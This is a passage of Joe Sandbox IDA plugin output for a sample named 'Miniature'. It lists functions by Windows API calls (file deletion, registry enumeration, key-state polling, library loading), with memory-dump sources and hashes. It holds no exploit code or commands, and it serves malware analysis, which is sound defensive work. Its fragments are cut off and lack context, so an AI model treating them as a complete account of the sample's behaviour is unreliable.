                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C74620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C727B3
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C727C6
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C727F6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                                            • Opcode ID: 12b37c675df37364e3912a1925855ed65cb4d32121a7727deee5363f696262f3
                                                                                                                                                                                                                                                                                            • Instruction ID: fec8fec26529a96a4d68e13d04097d1f90bdbbc6f75b736a4fb98be6ac1378c8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12b37c675df37364e3912a1925855ed65cb4d32121a7727deee5363f696262f3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C21E772900104BFDB09AB64DC46DFE77B8DF463A4F50812AF436971E1CB354D4AEA50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CA3A29
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00CA3A30
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CA3A45
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00CA3A4D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                            • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                            • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                            • Opcode ID: e907b6c2b77030206e18b93a50542bcf45f80f5d2f1a43436d346452eee42ff3
                                                                                                                                                                                                                                                                                            • Instruction ID: 10c07d1035fc1f0e0453ba7c01d2139437ed3d7130cf720cedc58c4b8592aa3d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e907b6c2b77030206e18b93a50542bcf45f80f5d2f1a43436d346452eee42ff3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8621A171600256AFEF108FA4DCA0FBB77A9EB4636CF105214FAA1961D0C771CE40A760
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C3508E,?,?,00C3502E,?,00CD98D8,0000000C,00C35185,?,00000002), ref: 00C350FD
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C35110
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00C3508E,?,?,00C3502E,?,00CD98D8,0000000C,00C35185,?,00000002,00000000), ref: 00C35133
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                            • Opcode ID: cb5c3dfb7edbda1e17c2485c891b591c9c14136a7b31fb39c84ccacc413a66ac
                                                                                                                                                                                                                                                                                            • Instruction ID: fd3295c1fab673df740677286a72e807b8963bc57c4cba60dcb13f1cc2164489
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb5c3dfb7edbda1e17c2485c891b591c9c14136a7b31fb39c84ccacc413a66ac
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3F04F31A10208BBDB119F94DC59BEDBBB8EF44756F4400A5F907A3160DB749A40DA90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C1668B,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C1664A
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C1665C
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00C1668B,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C1666E
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C55657,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C16610
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C16622
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00C55657,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C16635
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C835C4
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00C83646
                                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C8365C
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C8366D
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C8367F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00C9AE87
                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C9AE95
                                                                                                                                                                                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C9AEC8
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C9B09D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C9C10E,?,?), ref: 00C9D415
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D451
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D4C8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D4FE
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9C505
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C9C560
                                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C9C5C3
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00C9C606
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C9C613
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 826366716-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9d47ac21103c3f35731928c47374c9d5fb62056ed27316d7b40bcca665b499c9
                                                                                                                                                                                                                                                                                            • Instruction ID: 54766db871bd8133d45d6c4305d31f3889028b70e06dfeb79e3427eb1e2e2b14
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d47ac21103c3f35731928c47374c9d5fb62056ed27316d7b40bcca665b499c9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52619071208241AFD714DF14C4D4E6ABBE5FF85308F54859CF09A8B2A2CB31ED46EB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C7D7CD,?), ref: 00C7E714
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C7D7CD,?), ref: 00C7E72D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7EAB0: GetFileAttributesW.KERNEL32(?,00C7D840), ref: 00C7EAB1
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00C7ED8A
                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00C7EDC3
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7EF02
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7EF1A
                                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00C7EF67
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                                            • Opcode ID: bcd0aedaa51fc807f02d0aff010b9a50543cf291e9202b607c7e7e25b5601112
                                                                                                                                                                                                                                                                                            • Instruction ID: 429e61129e7c8a47ec9c77787341b1c047f58c6f3f80e4a336ead7b4ff143765
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bcd0aedaa51fc807f02d0aff010b9a50543cf291e9202b607c7e7e25b5601112
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B65184B20083849BC724EBA4DC819DBB3ECEF99350F40492EF199C3151EF70A688D756
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C79534
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 00C795A5
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 00C79604
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C79677
                                                                                                                                                                                                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C796A2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 07fe1cc01671432c652ba86129c0d3aa48ca6fcab1e56368f4b8c0a6ec43e80b
                                                                                                                                                                                                                                                                                            • Instruction ID: 6b49e2487496a662e6cfd04f74bde143b96254475afa4f3954f4e74f1f56b091
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07fe1cc01671432c652ba86129c0d3aa48ca6fcab1e56368f4b8c0a6ec43e80b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A5129B5A00619EFCB14CF68C884AAAB7F9FF89314B158559F91ADB310E734E911CF90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C895F3
                                                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00C8961F
                                                                                                                                                                                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C89677
                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C8969C
                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C896A4
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1bbc4db32aded00effc953b543bf6e058e5bbfb2618118692fd090762a3e1dc5
                                                                                                                                                                                                                                                                                            • Instruction ID: a07f8deb63e52e31c5a486a17353765448feb5f4832b161139b24a97ae081e17
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bbc4db32aded00effc953b543bf6e058e5bbfb2618118692fd090762a3e1dc5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34514E35A00215AFCB05DF55C881AAEBBF5FF49318F088058F84AAB362DB35ED41DB94
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00C9999D
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00C99A2D
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C99A49
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00C99A8F
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00C99AAF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C2F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00C81A02,?,75C0E610), ref: 00C2F9F1
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C2F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00C70354,00000000,00000000,?,?,00C81A02,?,75C0E610,?,00C70354), ref: 00C2FA18
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 666041331-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00CA766B
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 00CA7682
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00CA76AB
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C8B5BE,00000000,00000000), ref: 00CA76D0
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00CA76FF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C119E1
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00C119FE
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00C11A23
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00C11A3D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetInputState.USER32 ref: 00C84310
                                                                                                                                                                                                                                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C84367
                                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00C84390
                                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00C8439A
                                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C843AB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2256411358-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 95a968918cd65446f9c4371afbe134c0e2f724a3a3ebf77d83ddcbffaedb5a3c
                                                                                                                                                                                                                                                                                            • Instruction ID: d82fc004e66746fc62a762c24d62b080f3b7cd23659f643c5f0fe2464589fb53
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95a968918cd65446f9c4371afbe134c0e2f724a3a3ebf77d83ddcbffaedb5a3c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E3193705043879EEB3CEB64D888FAA37ACAB0130DF044569D473861B1E7A49585CB29
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C72262
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 00C7230E
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 00C72316
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 00C72327
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C7232F
                                                                                                                                                                                                                                                                                            Memory Dump Source
